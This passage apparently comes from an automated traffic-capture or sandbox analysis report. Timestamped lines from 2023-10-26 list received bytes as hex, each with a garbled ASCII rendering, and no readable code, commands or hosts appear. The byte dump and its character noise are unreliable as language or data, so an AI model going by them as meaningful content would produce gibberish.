57 2d 7d 15 05 c9 f5 95 f4 40 68 2e dd 9d 75 79 3d 71 50 2f 7b 5e 92 78 34 b0
                                                                              Data Ascii: e0RR{F!:HjR4wuFQ0($+%8K_$`8efJ\H,m"TuDO !@=[W-0,0J\jLp_`BT+!F[@}8XaDrteF`o2h~:J$] 7Ej1LQ?sogn+Qs$|$;U'vW-}@h.uy=qP/{^x4
                                                                              2023-10-26 07:45:59 UTC9311INData Raw: 65 ba 56 fd e5 94 4b 75 c4 8c 4e 54 b2 44 92 e2 ea b5 f6 f2 02 68 c5 59 df 6f ff 47 0b cb 7e 54 52 57 d1 55 ad 76 43 69 f5 82 93 49 99 36 2f 22 88 52 43 72 3f 5b fe c2 05 c7 57 90 6d d4 e0 24 cd c4 87 14 95 d4 7d 04 c8 97 58 7d e1 fa f8 aa 92 af b2 89 93 a7 22 42 d4 34 dc 0a 24 cc 09 d5 5b df d1 7a 03 e0 fc 69 67 dd 50 86 08 4e af 71 77 b8 19 6e fc cc cc 50 59 08 4a 58 b9 c5 f4 ea f2 31 d3 ea 9c ca 5c a0 39 68 eb 1d 3d f4 2b 43 cb d8 ea 77 d0 ec 50 ff 9f 75 9d e9 27 56 21 d4 9d 97 8a 3d 3f 39 ad 7b de c5 69 f7 4f 61 a7 5f 67 fc 02 68 c1 5b 1f 7f 4a c2 54 ef 76 9f 79 03 d2 7d 7e 24 de 05 68 f3 e5 7f 77 bb db b1 48 cf 89 ef f3 58 24 a6 50 e9 ca e9 20 89 6c 12 88 87 ce 1f 87 2d f6 c2 40 96 55 a2 77 84 02 e3 2d 7c 3b fc eb f6 c5 09 2e 5e c0 c2 db 01 28 f6 41
                                                                              Data Ascii: eVKuNTDhYoG~TRWUvCiI6/"RCr?[Wm$}X}"B4$[zigPNqwnPYJX1\9h=+CwPu'V!=?9{iOa_gh[JTvy}~$hwHX$P l-@Uw-|;.^(A
                                                                              2023-10-26 07:45:59 UTC9327INData Raw: 2e ff 14 8c 25 de 57 48 2c ef 5f 00 69 f4 4a 25 78 cc 0c ab 96 bc 8e d0 e2 e0 c2 45 e8 60 21 e0 38 00 1d b8 12 40 f0 5d 66 36 02 6e 5a 8a 31 95 89 5d c5 e4 80 a2 0a e0 7a 4e 15 25 9d 10 f7 93 f8 eb b8 00 a0 73 a7 b5 04 47 2c a6 04 71 68 50 2a 88 af f2 4e 1d e4 67 38 42 27 32 d4 4e 3b 5e 8e 9b 49 f4 87 74 d9 ce 08 96 9f 0a 6f 9a c4 d5 d3 49 13 5a be 8f 20 4b c4 68 ef ad 52 b0 d6 c1 4c b7 78 02 d6 24 ef 8e 46 4e ef 64 20 ba ec 8e a0 b5 35 2c d3 4d e0 38 9e 4b 5f 83 18 72 f4 18 18 1a f7 32 f8 d7 3c 2c 57 d2 a6 02 97 6c 49 c4 e0 41 40 f2 4d cf 99 66 07 6b 66 ac 52 9d 07 40 da d2 06 c0 50 79 5a 9a d3 42 02 cc c6 23 92 ce 8e c6 70 67 19 a1 0b 92 cc 12 f4 49 05 7d 4b 5a b1 f3 08 17 bc c1 db 81 26 e1 7f 2e 21 ee 37 53 64 06 97 95 fe 94 51 20 11 5b 39 c8 9a 57 40
                                                                              Data Ascii: .%WH,_iJ%xE`!8@]f6nZ1]zN%sG,qhP*Ng8B'2N;^ItoIZ KhRLx$FNd 5,M8K_r2<,WlIA@MfkfR@PyZB#pgI}KZ&.!7SdQ [9W@
                                                                              2023-10-26 07:45:59 UTC9343INData Raw: 43 72 f3 4f 31 5a a8 10 40 4a 59 49 30 ae a3 28 98 7e 82 9d 44 01 00 d1 5b 0b 70 68 e1 49 24 b4 be 92 16 ff d0 ca a3 05 19 96 e8 43 99 f9 18 1c f3 81 10 39 f6 00 48 6e 2e 1b 05 a0 16 80 26 c0 37 8e 12 9b c1 95 25 f5 bb 8c 80 9e ef db e0 2b 54 fb 5f 1e a0 f1 f9 0c 42 c4 e2 60 b5 52 b5 64 76 a2 16 d5 15 76 8b 50 74 dd 98 cc 26 4f 99 da c4 4b 36 20 13 37 0a 04 eb 28 6e 18 bc 16 13 96 bb 29 1f 6e a3 36 1c 02 4e 32 4d 7d 58 fa b7 d4 86 d4 82 fa 40 e5 44 4c c2 50 59 05 2f fd f1 84 3b 85 8a 30 d6 da e5 46 8c 34 84 70 30 51 5b 05 8d 4c fa a0 e6 36 b4 0c 44 c0 98 90 8a 71 8b 52 b1 24 82 a5 82 99 0e 80 82 34 41 b9 0d 95 d9 52 80 83 17 10 31 b5 2d 16 42 f5 ec 21 69 1b 23 2e 4b 5d 53 42 25 56 96 07 f3 3b 15 81 0e 9c c7 d8 69 57 0b 8b c0 1b 78 5a c4 f6 01 94 cc 82 aa
                                                                              Data Ascii: CrO1Z@JYI0(~D[phI$C9Hn.&7%+T_B`RdvvPt&OK6 7(n)n6N2M}X@DLPY/;0F4p0Q[L6DqR$4AR1-B!i#.K]SB%V;iWxZ
                                                                              2023-10-26 07:45:59 UTC9359INData Raw: a1 8d 4f e5 23 5b 44 bf 62 77 6a de 1b 1c 69 5c 1c c1 b6 89 26 45 5a 85 b1 be 8e 19 42 a4 aa c3 62 de 33 42 69 5f 40 3e 57 b0 27 2b 6d 71 e8 63 a4 3a c2 9e f2 16 28 da 1d 0e 30 45 40 ac 99 28 48 60 8d 58 d7 1f 95 4a a4 80 02 75 17 ac 1b 55 06 d2 ce 04 68 19 ca 23 46 5a 04 40 50 8c 8a b6 26 ba ba f9 0a 49 18 c3 ae 3f 2d c4 20 1c d2 22 10 88 0d 1d cb 2b 2d 30 bf e4 09 37 f0 20 03 02 3e fc 05 08 f8 df 6e 48 d0 e4 16 7a 34 bc 68 93 d2 b2 f2 04 45 3a a3 54 f4 ca 5e 48 2f a8 86 76 0a 08 02 10 e8 cb ed 9c 43 7b 5c 83 30 39 d1 e8 b0 72 e3 7b 20 ae c4 00 f0 e7 26 6b 6a bb 95 9e bd 59 f4 6f 10 d3 fb ca 9c 21 f5 81 3f 5c 46 8f fa 3a f7 56 92 c4 a6 ae e6 d9 c1 4f e8 56 b0 45 82 be 9f b8 c0 d5 31 76 7c ff e3 fa 73 f8 49 7d f1 5a c4 60 30 70 79 99 52 b7 ce 05 20 e0 84
                                                                              Data Ascii: O#[Dbwji\&EZBb3Bi_@>W'+mqc:(0E@(H`XJuUh#FZ@P&I?- "+-07 >nHz4hE:T^H/vC{\09r{ &kjYo!?\F:VOVE1v|sI}Z`0pyR
                                                                              2023-10-26 07:45:59 UTC9375INData Raw: 5b 01 64 bf c9 16 7f 31 28 7c 84 b7 80 08 c0 a5 52 88 02 e2 44 ff 19 76 0d 38 d3 4d 1d c3 cc 01 53 6b 29 2d 02 c3 00 16 14 b0 ae d1 2b d3 2f 30 7d ee 58 d9 33 43 00 b8 a9 92 e6 cd 06 7b 16 c5 75 84 83 88 22 a6 01 74 e4 2e 58 13 81 63 3f 41 38 34 15 6e 67 8a 0c 9f 54 86 03 78 96 02 25 04 f0 24 69 5e 83 b9 7a 17 6e c6 fe 9b 4c 84 95 98 65 ec 9b 5f ef 3c 4c 7f 00 8d ce 4a 45 b0 88 34 02 27 10 8a dd 65 bc 87 0d bc 5f e1 3f 41 f9 44 d2 8d 36 6a b4 c2 b7 e6 7e 7c 07 13 82 ca 72 8c 96 1c 60 e0 24 f5 e8 05 04 0b 8b 6e c0 5a 90 da 59 cc 91 38 06 84 78 14 31 c0 44 20 da 7c 4e f6 01 71 63 65 0d 3c 02 ea 60 fa 04 42 7a 93 d4 e0 c1 fa d3 f2 d1 09 79 3c d4 3a 16 cb 06 59 af 76 2d c4 70 78 25 57 27 22 5b e1 d7 81 51 53 b5 fd 32 78 01 70 92 2c 7b 41 20 32 7a 3d cf d0 78
                                                                              Data Ascii: [d1(|RDv8MSk)-+/0}X3C{u"t.Xc?A84ngTx%$i^znLe_<LJE4'e_?AD6j~|r`$nZY8x1D |Nqce<`Bzy<:Yv-px%W'"[QS2xp,{A 2z=x
                                                                              2023-10-26 07:45:59 UTC9391INData Raw: 97 36 35 db f8 71 49 3c 1e 00 51 1b ea 01 b3 b5 5a 15 4c 22 fe 7f f8 56 86 dd ad 54 1f 2b 40 6e 43 57 83 f9 32 14 24 e0 c3 9e 86 ba 7b 14 7d 3a f9 3e 05 f7 d3 fe 21 aa 35 08 4a b4 3d 21 1a 7e 67 14 57 d6 91 78 e9 cf b7 91 ed 52 c4 ba b4 04 d0 ff 7e f7 da 80 aa 05 81 c2 b8 19 2c db 77 97 00 20 f0 15 18 41 89 0b d2 5a 44 31 ce 71 9d 47 39 b0 16 35 60 eb 09 cb 7f e9 c0 f9 aa cb 57 e5 ab 27 01 3d 6a aa 7f c6 fe 1c d2 06 11 51 33 05 ad 4b d7 5a 48 28 4f 57 50 bf 11 31 59 fa 38 29 5f 13 8c e9 ab ab 68 0b 11 bb fe 7a db 91 01 0f f2 0b 7d 5b 2b 09 2e 51 dc c9 49 90 3e ad 80 3f 5c 73 bf 59 80 81 f1 a2 72 57 0e 45 31 89 cd 18 44 29 7f 16 a7 1b ab 75 a9 96 70 89 88 2e 3a c8 7e 87 5e 24 66 79 7e 09 b5 7e 01 80 1a 0a 8d 2e c1 cb be 94 22 82 04 d9 0c f0 79 81 3c 22 3a
                                                                              Data Ascii: 65qI<QZL"VT+@nCW2${}:>!5J=!~gWxR~,w AZD1qG95`W'=jQ3KZH(OWP1Y8)_hz}[+.QI>?\sYrWE1D)up.:~^$fy~~."y<":
                                                                              2023-10-26 07:46:00 UTC9407INData Raw: 3c 18 14 ee 15 28 ab 38 25 d8 0f 76 5d 59 67 c8 5b 92 e2 47 a0 e6 6f a7 a1 44 be 60 38 b4 c6 2c 3d 6e 14 0c 9e c2 b2 e1 60 9b 04 7d ea 17 83 12 ea c9 b6 3f a3 67 f5 e0 df c0 09 05 f9 7d 58 d6 da e5 b9 04 0e 31 c8 ae 29 d5 38 f3 e0 bb c6 e5 27 da 28 fe 9c 49 74 ae 52 02 12 e9 a1 d7 a3 90 8d 95 82 49 0f 8c 83 59 68 09 ad 4f 7f 5b fc f1 c0 d6 c8 bd 5f 87 10 1c 02 bb 5c c6 5f 28 5d 46 ee 75 f3 18 93 ee 5b 0e cb 2a 2f 48 af c1 c2 c3 80 23 fd a3 52 20 44 01 4e da f6 c4 2e 51 13 9f 0d 49 bf 61 7c 90 4f b2 ae b7 86 84 41 59 b7 11 d0 da 40 2e e9 5f 12 91 ee 30 ca ac 0a 72 3e 3c 5d 3f fa 1f 85 c0 8c 29 c7 46 a7 fb ef d0 b3 72 1c 03 9f c5 ba 80 bd 57 be 69 3f e9 76 ec 48 18 84 22 5f 2f 78 22 99 26 00 fe 69 17 27 98 41 90 4e 33 4c f9 26 2e ac ae 44 0b e5 5e c8 c1 5c
                                                                              Data Ascii: <(8%v]Yg[GoD`8,=n`}?g}X1)8'(ItRIYhO[_\_(]Fu[*/H#R DN.QIa|OAY@._0r><]?)FrWi?vH"_/x"&i'AN3L&.D^\
                                                                              2023-10-26 07:46:00 UTC9423INData Raw: 2c 14 aa cb f6 63 1b 1a 06 07 00 08 84 03 58 11 56 c8 24 5f b5 9c 88 f5 69 93 70 d7 60 1c f6 10 02 d3 48 c6 1f e3 7b 10 b6 26 bf 2e 42 a8 01 40 06 04 89 5d 00 32 37 36 3b 8a df bd a9 02 c7 b9 de 92 19 e0 57 af e4 22 4d 80 2d 40 18 84 4a d3 50 ee 0c 27 fa 84 e2 4a 20 ae 01 1b 71 d5 bc 21 20 1c f1 60 32 14 92 1d 27 81 de 2c 5f dd 80 79 73 6d b0 a6 f1 2d 80 03 c0 2a 90 0c c0 18 2a 7d 47 a4 1c 6e 2d b0 b6 bb 66 51 80 5e 68 bb 40 e0 1c e9 f3 6d 54 06 78 a1 7d 6b d3 1c 00 62 11 c6 c9 dd 16 e9 a5 62 ac 45 0a ce fa 7a 5f a8 64 28 bd 8b 12 7d 60 d0 e3 a4 c8 28 bd d1 93 03 0b 1d 9c 78 16 50 8c 0c 93 ca 3f 80 27 7a 52 89 db 63 c5 17 e5 a8 be 7c 5b 30 5b 5a bc 11 ac 85 40 77 1e 0f 9b 13 6c 3d e0 9c d1 0f 8d ff 97 75 3b 2b 04 20 09 3f 8f 83 64 e1 b6 7b f7 7f 84 48 06
                                                                              Data Ascii: ,cXV$_ip`H{&.B@]276;W"M-@JP'J q! `2',_ysm-**}Gn-fQ^h@mTx}kbbEz_d(}`(xP?'zRc|[0[Z@wl=u;+ ?d{H
                                                                              2023-10-26 07:46:00 UTC9439INData Raw: 84 af 73 fe 29 db 04 0d c4 6f ff 8b 1b 40 25 51 00 53 56 68 79 05 7b 6f 5e 12 83 c6 01 ee 1f 9d 87 c1 13 29 91 58 89 f3 fe 5d 5c b5 4c 48 44 3b b2 b9 df fa 28 d9 9d 93 f6 82 e0 3e b7 7f 40 9b 55 52 1e 68 96 a4 58 7c 4d b6 65 e0 fd 90 96 61 d5 14 eb a5 f5 f1 03 21 e2 de 42 5c 09 09 77 47 be 09 51 8f 77 18 a1 59 b7 23 fb 73 b2 fa b9 8f 0e b7 e0 2b a7 91 b5 26 94 09 6c 6f 38 fc c4 99 6b e5 c3 fc 84 03 8d 17 ef 7c c6 ae 0b d8 13 bd 66 d7 98 05 4a 91 37 46 a2 0e a0 58 27 fa 0b c9 8e db 7f c5 5e af 76 0d 4e a6 1f 89 0a b6 b4 8c 1a 36 24 5e bd 31 93 c4 af 09 29 c1 56 64 80 9d f0 16 b2 1a c8 30 45 05 24 a1 41 b1 b4 6a 17 6a a4 23 43 30 37 da 14 67 fc e6 00 9b 4d 5a 94 1b 46 6e 64 04 d7 dc 5e 2d 22 b9 33 18 77 4e 64 66 01 00 d5 fe 74 f7 9c 68 87 ea e2 6e 4f 56 22
                                                                              Data Ascii: s)o@%QSVhy{o^)X]\LHD;(>@URhX|Mea!B\wGQwY#s+&lo8k|fJ7FX'^vN6$^1)Vd0E$Ajj#C07gMZFnd^-"3wNdfthnOV"
                                                                              2023-10-26 07:46:00 UTC9455INData Raw: bb a2 e3 33 ca 8f 5a 50 e6 7c 91 ca 40 a8 33 f7 ad 99 f0 5c 13 25 36 65 42 d8 e8 d1 5e 55 40 b3 79 b2 83 a8 0e 76 bc c4 0a 36 7d d0 0f 03 0f 84 18 f7 88 e5 1a 13 46 83 08 16 61 2e c5 0a ba 1a e0 41 b1 65 96 2e 93 3d ed 04 14 23 e7 3a 99 00 79 8a 1d dc cf 00 c6 c8 ac cc cd a4 0c 7d 02 74 69 5d 58 f4 c4 54 95 06 f8 3b d6 0d 97 83 b4 e3 72 f8 2c 26 f3 67 88 5c 1b b0 61 31 f0 2d bd d0 dc 62 3f 30 8f 07 fd 59 c7 20 8c 7f c5 df ec 80 80 16 97 94 e9 4a 05 0c 54 68 36 cc cf 92 84 de d3 21 d1 71 4e 1e 87 c3 2c dd 19 60 04 9c 96 1b e5 53 be cb 12 4b a9 09 e1 41 54 6e 8c 48 3f 21 13 e2 80 68 d7 29 ae 33 52 9b 92 0f 08 5a c1 c6 cd dc 1f d4 a0 7a 2d 4f 7c dd 36 e2 bf e5 92 44 54 bf ce 0e 4a f3 94 f4 21 81 68 80 d9 65 31 af cc ee df 95 f7 1e c5 09 12 a9 fa 63 d6 28 7c
                                                                              Data Ascii: 3ZP|@3\%6eB^U@yv6}Fa.Ae.=#:y}ti]XT;r,&g\a1-b?0Y JTh6!qN,`SKATnH?!h)3RZz-O|6DTJ!he1c(|
                                                                              2023-10-26 07:46:00 UTC9471INData Raw: e8 0e ab f8 00 d4 3f 89 6f e5 8d 7e 74 60 dd 2c e3 1b 88 c0 1e be fb a5 f4 dc 0f b2 d6 e1 51 5f 19 37 2b 42 e9 c9 92 04 10 d7 03 38 c8 36 70 a0 11 fa 05 44 06 35 80 09 04 a0 9a 9a 3f 0f f5 59 d5 58 60 84 19 a3 dc 6a 5a 28 81 ea ba 20 2a ef 20 68 3a 95 a6 73 c0 5a 3d 53 84 b4 5a 18 0e e5 5d 3c 77 84 f1 0c fa 45 3c c0 47 81 84 f7 e4 3e f2 ee d7 ff c0 06 3e 8f 28 5a 10 8b 4a 4e 9f c4 17 19 43 af 2b ee 10 20 d6 4e db 74 2d 8a 41 8c d0 e8 c6 85 19 b0 4b 18 1e e9 d5 5f 84 1c 4c 8b a0 cc 90 2e 50 3b 6c 59 12 86 11 a5 f9 5b c1 6b d6 2e b9 07 c4 f1 80 2a ce dd 65 0e b7 74 39 b1 98 28 91 fa 09 68 3d 59 2a 57 79 c2 40 d3 af 1e 66 b0 78 83 b0 03 de 2c d9 f5 5f b2 c8 3c a5 6b 72 f4 04 dd a8 21 98 f7 fb 7c c0 06 4d 0d f0 10 3b a5 c9 a3 e0 42 48 8d e2 21 31 29 30 18 3f
                                                                              Data Ascii: ?o~t`,Q_7+B86pD5?YX`jZ( * h:sZ=SZ]<wE<G>>(ZJNC+ Nt-AK_L.P;lY[k.*et9(h=Y*Wy@fx,_<kr!|M;BH!1)0?
                                                                              2023-10-26 07:46:00 UTC9487INData Raw: 40 08 26 c6 79 0f 2a fc 3a 67 93 c4 4e 51 1a d3 e2 52 14 dc 50 3b 28 11 e1 b0 00 2c 40 98 32 24 5f 95 62 2d a8 86 dc c9 64 cb f8 4f 00 3b 03 8b 6d 4b 1f 19 3b 16 e9 ce ea 60 ad a9 59 76 5c 3d 58 02 c0 13 21 79 42 e4 41 04 34 dc ef 0e 44 ef e9 ca 90 0d 4c 33 4e 70 58 05 bc 7a fe 7f bd 7c 1e 7a 60 03 ed 39 46 ff 69 4b 57 71 3a 79 05 a1 45 35 30 cb da 86 d0 5c e2 b8 4d 86 4a ab 5e 8f 45 95 7a 75 03 f8 5a e9 87 2f 3b 52 8b 52 55 05 5d f2 ff b5 44 3a 42 ab a1 46 af c3 df da 55 90 a2 c6 bf 25 de 7c 55 20 22 68 34 bd 6e 51 4f 78 3d 4b 3e a4 12 b5 5f fb 64 35 ae e2 18 90 15 5b be 2e 77 5a b9 4b c0 62 29 fe 13 44 9f fe ff 5a 6c 77 51 05 17 7c cc 9d 4f 54 f8 59 0a 0c 3c 4f 02 68 9f b9 5e 3f 54 4b c1 70 08 fd 7d a8 4a f9 33 e4 b3 95 08 42 2f bf 83 e0 01 ed cd bc bf
                                                                              Data Ascii: @&y*:gNQRP;(,@2$_b-dO;mK;`Yv\=X!yBA4DL3NpXz|z`9FiKWq:yE50\MJ^EzuZ/;RRU]D:BFU%|U "h4nQOx=K>_d5[.wZKb)DZlwQ|OTY<Oh^?TKp}J3B/
                                                                              2023-10-26 07:46:00 UTC9503INData Raw: 14 a6 e2 f5 3c 06 9a ab aa 2f bc 91 b7 a3 58 21 e6 8d b8 18 19 89 5d 60 79 6e b1 4d f9 80 83 24 d0 65 58 a2 25 e8 64 60 a4 1b 75 ca 10 ec a0 00 43 de a2 eb fc 04 40 ea 62 1a 41 4c c5 6c 7a 88 c1 f0 d6 a0 20 c6 2e a8 7c a1 f3 13 c5 4d 60 23 b3 1f 86 1f 7f af 90 90 cc f5 00 17 ac ae 14 41 91 5e 35 02 ec 81 8f a7 6b 1e 44 a0 3b c8 1b b1 37 a0 f8 99 2e b4 e0 f0 b2 90 e6 25 44 c4 f6 f2 b5 65 0c 0c 60 f8 62 09 1a 0a b3 56 9d 02 72 96 65 5c e4 91 5e 24 88 0a b9 16 2b b5 4d 21 c6 96 4a 40 0e 1f 17 5d 0e 9e 68 85 0b e5 40 4d b5 d0 8c 64 44 f3 8c d6 1f 1c 2a 7d 84 29 0d 78 ac 66 cf 1d 35 94 3f bb 50 ad 43 31 f3 44 24 e1 3f 3f ad 36 4b 80 08 90 64 40 49 3b b2 00 da 61 19 ae b2 db 96 71 f6 a1 c2 d8 6e 87 d8 6b 74 4c cc 10 3c 1f 2a 3f 75 32 d1 5e ab bc 79 48 89 39 b5
                                                                              Data Ascii: </X!]`ynM$eX%d`uC@bALlz .|M`#A^5kD;7.%De`bVre\^$+M!J@]h@MdD*})xf5?PC1D$??6Kd@I;aqnktL<*?u2^yH9
                                                                              2023-10-26 07:46:00 UTC9519INData Raw: 87 d0 00 d8 5d f0 27 5a 76 22 11 38 fe 19 40 5e 14 46 94 02 ee 18 29 15 18 27 f5 30 41 e5 80 1a a4 57 c3 4d 07 d3 b0 be 2c 28 54 9e 98 13 de 2d 20 83 3e f3 b0 37 36 98 03 90 9c 68 c0 4a f6 cc ab 4c cd 57 0a c7 78 49 3c f8 5f 1f 48 bf 56 03 bf da 07 27 59 50 43 14 aa bc e4 14 d3 b1 e1 3f f9 64 e6 09 bf c7 1b 82 4f 7a fc 19 d5 c5 3f fa 5f 7b 5f 69 7d b6 cf fd 3e 29 57 2e 28 df c1 12 a5 b5 67 ee f2 2b a4 eb 8a fd 04 f6 d8 85 6f aa f3 de a2 5c dd 3d c9 ad f7 29 8d ff 23 33 e3 c1 82 10 3c b5 59 e1 70 e9 7d 17 8b e4 ff ab 95 97 fe 47 90 be 99 c5 77 ba 89 3e 12 09 56 f5 6a be d7 ee b3 d3 aa bb 13 dc ad 73 89 52 5f 4c 0a 49 5a 64 0b 43 71 df 5f 9e 35 0b 3f fb ad 6d d5 c5 94 69 de 06 cb d5 bd e8 27 7e 98 5e bd 5b 69 cc 3f c5 b5 24 2b 18 ea 13 3a bf f3 bb a5 fe 8d
                                                                              Data Ascii: ]'Zv"8@^F)'0AWM,(T- >76hJLWxI<_HV'YPC?dOz?_{_i}>)W.(g+o\=)#3<Yp}Gw>VjsR_LIZdCq_5?mi'~^[i?$+:
                                                                              2023-10-26 07:46:00 UTC9535INData Raw: d2 f1 4c 10 c9 49 fd 61 6f 5b f3 5a 8d e3 73 61 24 89 fe 36 74 52 2f 14 73 a8 79 2c 03 cc e4 dd 5a 5e ec f4 1e a4 2d 40 19 d0 05 30 18 6c 14 1e 2d fb b4 8a 0c 87 7a 3c 39 18 67 83 f2 14 04 dc 88 44 5a 50 29 82 d6 0f 6d a3 aa 48 a0 25 ea 95 78 7f 3b f0 c2 2f f5 dd 1e 9f ed 3e bd dc dd ac de e0 48 a2 99 a1 da d4 4c 77 17 9b a7 c7 e5 04 37 23 cc 18 c4 86 1f f0 17 03 94 4b c9 7a 73 9c 84 aa fc f3 c6 1b bb 14 54 29 c8 1d 02 03 88 7a 1c 2b 05 75 b2 2b d5 50 79 71 f6 ec 20 5a 04 ca 14 38 2d aa a2 c2 25 49 4f 23 52 f1 03 01 2c 1f 74 9f de 13 57 70 2c 85 59 94 00 84 6b 6e 10 82 09 ea 54 5e 5b 19 29 5c 1b 14 16 ef 60 20 a1 51 1c 17 54 06 29 fc 07 c6 33 99 80 00 b1 74 02 6a d5 95 17 12 9f f9 3d 8c 05 31 80 66 00 25 60 7e b3 33 a3 59 ab 16 4b c3 e0 8a 52 a0 37 60 0a
                                                                              Data Ascii: LIao[Zsa$6tR/sy,Z^-@0l-z<9gDZP)mH%x;/>HLw7#KzsT)z+u+Pyq Z8-%IO#R,tWp,YknT^[)\` QT)3tj=1f%`~3YKR7`
                                                                              2023-10-26 07:46:00 UTC9551INData Raw: 08 d8 91 04 bd 47 c8 30 64 77 d3 14 5c 3e e9 84 02 f0 e4 b1 c8 ff 5d f6 b6 58 ee c5 38 22 43 47 60 e0 81 99 b0 50 00 0c 6d f0 3b 54 33 c7 63 f0 e4 a2 38 75 c6 1d 05 6a f0 7e 40 10 0f ef 49 45 81 b1 b2 85 53 1b 60 32 31 32 08 36 b2 1e 09 fa 4f 97 b8 fe c0 63 76 c7 14 60 a6 87 0c 4e bf 18 3c 34 d1 da bd 01 fc 8e af e4 40 44 e7 53 06 5f 44 c3 ba 5e 0b 14 24 8b de 22 1e 73 4a da 78 0b 2c d2 a2 55 57 18 41 84 03 2d a8 4c c9 3a f8 6c d0 0c 87 75 82 cb 05 9d cb ea cc bd b2 05 80 d4 08 ca 21 a0 d0 cb 3e 4e de 41 72 aa ca b0 65 3c 87 bc 5c 50 a6 c7 0e b2 4b 58 47 d3 8c 6c a7 4e e9 31 6e eb d9 3e db ce 13 20 a7 91 9a bd c1 6a a9 7a 88 4b 5b c5 a8 3a 85 64 42 88 6e ee 40 fe ae 7d c4 4c 06 4c 00 3f 80 0b 94 77 7e 58 00 5b df d3 88 e8 fb 50 08 0b 2f cf 24 ec 5e 58 4f
                                                                              Data Ascii: G0dw\>]X8"CG`Pm;T3c8uj~@IES`2126Ocv`N<4@DS_D^$"sJx,UWA-L:lu!>NAre<\PKXGlN1n> jzK[:dBn@}LL?w~X[P/$^XO
                                                                              2023-10-26 07:46:00 UTC9567INData Raw: 53 d1 f0 b0 60 24 97 b4 57 86 fd 4c 79 16 30 d5 b2 36 15 1f a9 00 63 56 31 58 2f 3f cc 79 e0 01 20 21 1a 52 1d ca 28 87 a7 38 2a 30 70 12 6c 01 4e ef f3 02 f7 05 56 cb f2 84 94 b1 fb 35 8a 80 9a d8 2c 98 61 a2 18 f3 62 b5 7c 32 80 dc 09 3d 42 0f 9d e8 84 44 ce 4b 07 80 88 61 65 7e b6 5e 4f e0 82 41 11 e6 b5 03 d2 0f f7 65 fd e1 70 e2 0f e0 cd c5 27 20 ff a0 31 c2 29 03 c0 99 b3 43 9c 57 8d eb 02 d8 7e 9d 8e 71 97 a5 fd 4a 9b 92 e0 00 12 68 3c 4b 9f f1 3a ea 2b c6 25 5b 5d 6f b6 83 88 d5 ae 3f f5 8e d5 49 54 41 12 32 66 74 38 09 e7 58 a5 07 4c a6 7f 57 60 13 be ff 7d 99 a2 12 5f bb b3 c9 07 99 2d 3d 7d 57 6d 92 bf 78 75 d4 0e ee 89 de 5d f1 00 ad 5d 97 6b a5 5d 45 03 c9 94 33 8f 1c 27 f7 9c 4d b5 76 8c 74 0d a7 db fa 23 6a 3b fb 7d 9b 37 2e 89 5b 7d f3 2e
                                                                              Data Ascii: S`$WLy06cV1X/?y !R(8*0plNV5,ab|2=BDKae~^OAep' 1)CW~qJh<K:+%[]o?ITA2ft8XLW`}_-=}Wmxu]]k]E3'Mvt#j;}7.[}.
                                                                              2023-10-26 07:46:00 UTC9583INData Raw: f2 9c 4c ff e2 e2 10 04 11 73 00 5e c9 7d d5 69 1a 08 d8 5f 58 31 21 a2 7f 00 25 1d 92 04 7d fd 2c be 7c aa a2 4c 10 ed 44 00 02 c3 13 6f 98 e0 19 f3 6a 20 53 55 c5 37 a0 98 a3 bc a0 88 41 3c 5c a1 59 70 26 85 6e 9c 43 d2 19 c3 26 18 3c 63 bf 40 50 cf 33 e1 f8 88 af d9 3f 45 82 70 88 ab 42 08 5d d9 8e 03 4d 4a 3d b7 12 4c a8 45 90 c8 17 4e c8 63 19 58 d8 dd 06 08 1e 2d e6 75 58 2d 29 4a bf 47 84 b5 39 e1 aa bc b3 ab 09 eb 39 65 60 44 78 42 00 6d 54 b3 a4 98 77 a3 16 9f d6 10 c3 d6 58 13 c8 9f 51 92 68 61 66 06 00 41 06 64 02 52 f7 4c 86 b5 bb 27 1e a8 70 1c 98 a4 74 e7 37 13 5e 2b 4b 34 6c af e2 7a 12 9c 7f c0 4b 6e 7a 03 09 f0 f9 43 30 91 bc 1c b0 f1 30 c8 b3 77 e9 6e 8c fe 8f 18 b2 84 d6 2c 53 f4 95 20 27 fb 83 91 a1 cb 18 54 10 20 44 19 72 0f 2c 5c a8
                                                                              Data Ascii: Ls^}i_X1!%},|LDoj SU7A<\Yp&nC&<c@P3?EpB]MJ=LENcX-uX-)JG99e`DxBmTwXQhafAdRL'pt7^+K4lzKnzC00wn,S 'T Dr,\
                                                                              2023-10-26 07:46:00 UTC9599INData Raw: 06 8d 87 f7 d1 22 42 2e 71 e3 fa 40 9c 54 e4 58 c2 8c bf 93 7a 46 00 02 ef 84 5a 4f 4b d9 d5 20 54 9f 41 90 26 ce 84 18 d2 a4 10 44 92 c8 2e f3 d7 90 42 51 c1 dd 95 3a 93 d2 84 98 c8 c8 35 95 dd 95 34 93 db 4c 4a ac 25 17 03 9f ee b3 73 8e 81 c2 68 43 e5 cd fa 8c 86 7a 48 38 36 06 2e 90 1f 6e 48 69 a0 1d 68 e0 16 f8 80 06 12 a0 bc 3d f4 0d 02 e2 d3 a3 3c 00 6a ef 7b 96 aa ca 8c 0f 4c 13 74 26 99 31 80 9c b5 bf a8 4e 2b 38 fc 28 65 69 aa 90 98 3d 1f 94 2d 0d 04 fd 3a e0 00 d3 40 a0 49 25 59 04 88 da 44 41 a4 94 e4 5c 62 8c 70 ac 44 4b 98 13 d6 8a 1d 39 b4 e9 68 39 22 10 28 fd c2 32 d1 81 5a 22 f8 a5 91 d0 17 62 17 77 e8 9f d3 d7 f3 d1 e3 3c 69 c0 e0 13 18 38 32 7b ee 23 4b 5b 94 41 b4 5d 75 e5 6d 2f ff 20 2e 47 87 4b 9f 5d 9a 77 05 aa e1 ec ca 0e ac c6 b5
                                                                              Data Ascii: "B.q@TXzFZOK TA&D.BQ:54LJ%shCzH86.nHih=<j{Lt&1N+8(ei=-:@I%YDA\bpDK9h9"(2Z"bw<i82{#K[A]um/ .GK]w
